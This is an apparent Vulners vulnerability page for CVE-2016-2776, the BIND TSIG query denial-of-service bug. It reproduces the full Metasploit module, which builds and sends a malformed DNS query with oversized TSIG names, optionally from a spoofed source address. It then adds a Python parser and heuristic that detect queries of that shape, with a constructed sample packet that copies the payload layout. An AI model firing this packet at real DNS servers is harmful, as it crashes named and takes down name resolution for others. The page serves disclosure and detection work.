BIND TSIG Query Denial of Service

The BIND TSIG Query Denial of Service vulnerability in named can cause an assertion failure in buffer.c.

Code
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Capture
  include Msf::Auxiliary::UDPScanner
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'BIND TSIG Query Denial of Service',
      'Description'    => %q{
        A defect in the rendering of messages into packets can cause named to
        exit with an assertion failure in buffer.c while constructing a response
        to a query that meets certain criteria.

        This assertion can be triggered even if the apparent source address
        isn't allowed to make queries.
      },
      # Research and Original PoC - msf module author
      'Author'         => [
        'Martin Rocha',
        'Ezequiel Tavella',
        'Alejandro Parodi',
        'Infobyte Research Team'
      ],
      'References'     => [
        ['CVE', '2016-2776'],
        ['URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html']
      ],
      'DisclosureDate' => '2016-09-27',
      'License'        => MSF_LICENSE,
      'DefaultOptions' => { 'ScannerRecvWindow' => 0 }
    ))

    register_options([
      Opt::RPORT(53),
      OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])
    ])

    deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')
  end

  def scan_host(ip)
    if datastore['SRC_ADDR']
      scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR'])
    else
      print_status("Sending packet to #{ip}")
      scanner_send(payload, ip, rport)
    end
  end

  def payload
    query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65
    query << "\x00\x00"                          # Flags: 0x0000 Standard query
    query << "\x00\x01"                          # Questions: 1
    query << "\x00\x00"                          # Answer RRs: 0
    query << "\x00\x00"                          # Authority RRs: 0
    query << "\x00\x01"                          # Additional RRs: 1

    # Domain Name
    query << get_domain                          # Random DNS Name
    query << "\x00"                              # [End of name]
    query << "\x00\x01"                          # Type: A (Host Address) (1)
    query << "\x00\x01"                          # Class: IN (0x0001)

    # Additional records. Name
    query << ("\x3f" + Rex::Text.rand_text_alphanumeric(63)) * 3 # 192 bytes
    query << "\x3d" + Rex::Text.rand_text_alphanumeric(61)
    query << "\x00"

    query << "\x00\xfa"                          # Type: TSIG (Transaction Signature) (250)
    query << "\x00\xff"                          # Class: ANY (0x00ff)
    query << "\x00\x00\x00\x00"                  # Time to live: 0
    query << "\x00\xfc"                          # Data length: 252

    # Algorithm Name
    query << ("\x3f" + Rex::Text.rand_text_alphanumeric(63)) * 3 # Random 192 bytes
    query << "\x1A" + Rex::Text.rand_text_alphanumeric(26)       # Random 26 bytes
    query << "\x00"

    # Rest of TSIG
    query << "\x00\x00" + Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART
    query << "\x01\x2c"                          # Fudge: 300
    query << "\x00\x10"                          # MAC Size: 16
    query << Rex::Text.rand_text_alphanumeric(16) # MAC
    query << "\x8f\x65"                          # Original Id: 36709
    query << "\x00\x00"                          # Error: No error (0)
    query << "\x00\x00"                          # Other len: 0
  end

  def get_domain
    domain = "\x06" + Rex::Text.rand_text_alphanumeric(6)
    org    = "\x03" + Rex::Text.rand_text_alphanumeric(3)
    domain + org
  end
end
```
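The module above builds a plain query whose additional section carries a TSIG RR with a 255-byte owner name and a 220-byte algorithm name, far longer than the key and algorithm names any real signed query uses. From the defender's side, that shape is what a network sensor in front of named would look for. The following is an added example, not code from the Vulners page or from the Metasploit module: a minimal DNS wire-format parser that walks a message, reports TSIG RRs found in the additional section of a query (QR bit clear), and applies an assumed heuristic (`is_suspicious`, with an assumed 200-byte budget for owner plus algorithm name). The function names, the `build_query` helper and both sample packets are constructed for this example; the field values in them are placeholders.

```python
import struct

TYPE_TSIG = 250   # TSIG RR type (RFC 2845); TSIG RRs are carried in class ANY
CLASS_ANY = 255

def unpack(fmt, msg, off):
    """struct.unpack_from with a clean ValueError on truncated input."""
    if off + struct.calcsize(fmt) > len(msg):
        raise ValueError("truncated message")
    return struct.unpack_from(fmt, msg, off)

def encode_name(labels):
    """Encode a label list as an uncompressed DNS wire-format name."""
    out = b""
    for label in labels:
        data = label.encode("ascii")
        if not 0 < len(data) < 64:
            raise ValueError("label length must be 1..63")
        out += bytes([len(data)]) + data
    return out + b"\x00"

def read_name(msg, off):
    """Walk a (possibly compressed) name; return (uncompressed length, end offset)."""
    length, end, hops = 0, None, 0
    while True:
        if off >= len(msg):
            raise ValueError("truncated name")
        l = msg[off]
        if l & 0xC0 == 0xC0:                          # compression pointer
            if hops > 32:
                raise ValueError("compression pointer loop")
            end = off + 2 if end is None else end     # name ends after the first pointer
            hops, off = hops + 1, unpack("!H", msg, off)[0] & 0x3FFF
            continue
        off, length = off + 1, length + 1             # count the length octet
        if l == 0:
            return length, (off if end is None else end)
        if off + l > len(msg):
            raise ValueError("truncated label")
        off, length = off + l, length + l

def parse_rr(msg, off):
    """Parse one RR header; rdata stays in place and is located by offset."""
    name_len, off = read_name(msg, off)
    rtype, rclass, _ttl, rdlength = unpack("!HHIH", msg, off)
    if off + 10 + rdlength > len(msg):
        raise ValueError("truncated rdata")
    rr = {"name_len": name_len, "type": rtype, "class": rclass,
          "rdlength": rdlength, "rdata_off": off + 10}
    return rr, off + 10 + rdlength

def parse_tsig_rdata(msg, off, rdlength):
    """Decode TSIG rdata fields (RFC 2845 layout)."""
    end = off + rdlength
    alg_len, p = read_name(msg, off)
    _t_hi, _t_lo, fudge, mac_size = unpack("!HIHH", msg, p)
    p += 10 + mac_size                                # skip time signed, fudge, MAC
    if p + 6 > end:
        raise ValueError("truncated TSIG rdata")
    orig_id, error, other_len = unpack("!HHH", msg, p)
    return {"alg_len": alg_len, "fudge": fudge, "mac_size": mac_size,
            "orig_id": orig_id, "error": error, "other_len": other_len}

def find_tsig_in_query(msg):
    """TSIG RRs in the additional section of a query (QR clear); [] otherwise."""
    _txid, flags, qd, an, ns, ar = unpack("!6H", msg, 0)
    if flags & 0x8000:
        return []                                     # a response, not a query
    off, qname_len = 12, 0
    for _ in range(qd):
        n, off = read_name(msg, off)
        qname_len, off = max(qname_len, n), off + 4   # skip qtype, qclass
    for _ in range(an + ns):
        _rr, off = parse_rr(msg, off)
    found = []
    for _ in range(ar):
        rr, off = parse_rr(msg, off)
        if rr["type"] == TYPE_TSIG and rr["class"] == CLASS_ANY:
            tsig = parse_tsig_rdata(msg, rr["rdata_off"], rr["rdlength"])
            tsig.update(owner_len=rr["name_len"], qname_len=qname_len,
                        rdlength=rr["rdlength"])
            found.append(tsig)
    return found

def is_suspicious(tsig, name_budget=200):
    """Assumed heuristic: real key/algorithm names are a few dozen bytes; owner
    plus algorithm names near the 255-byte name limit match the PoC shape."""
    return tsig["owner_len"] + tsig["alg_len"] > name_budget

def build_query(qname, key_name, alg_name, mac_size=16):
    """Constructed test input: one A question plus one TSIG RR (placeholder values)."""
    header = struct.pack("!6H", 0x1234, 0, 1, 0, 0, 1)
    question = encode_name(qname) + struct.pack("!HH", 1, 1)
    rdata = (encode_name(alg_name) + struct.pack("!HIHH", 0, 0, 300, mac_size)
             + b"\x00" * mac_size + struct.pack("!HHH", 0x1234, 0, 0))
    rr = struct.pack("!HHIH", TYPE_TSIG, CLASS_ANY, 0, len(rdata))
    return header + question + encode_name(key_name) + rr + rdata

# Constructed samples: a normally signed query, and one laid out like the module above.
BENIGN = build_query(["www", "example", "com"], ["tsig-key", "example"], ["hmac-sha256"])
POC_SHAPE = build_query(["abcdef", "org"], ["a" * 63] * 3 + ["b" * 61],
                        ["c" * 63] * 3 + ["d" * 26])
```

Running `find_tsig_in_query` over `BENIGN` yields an owner name of 18 bytes and an algorithm name of 13 bytes, which `is_suspicious` passes; `POC_SHAPE` yields 255 and 220 bytes with a 252-byte rdata, the same lengths the module's comments give, and is flagged. The parser follows compression pointers and bounds-checks every field, so it can sit on a capture feed without being tripped by truncated or malformed queries.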


31 Aug 2024 00:00 (Current)
Vulners AI Score: 7.1 (High risk)
CVSS 3: 7.5
CVSS 2: 7.8
EPSS: 0.8745
329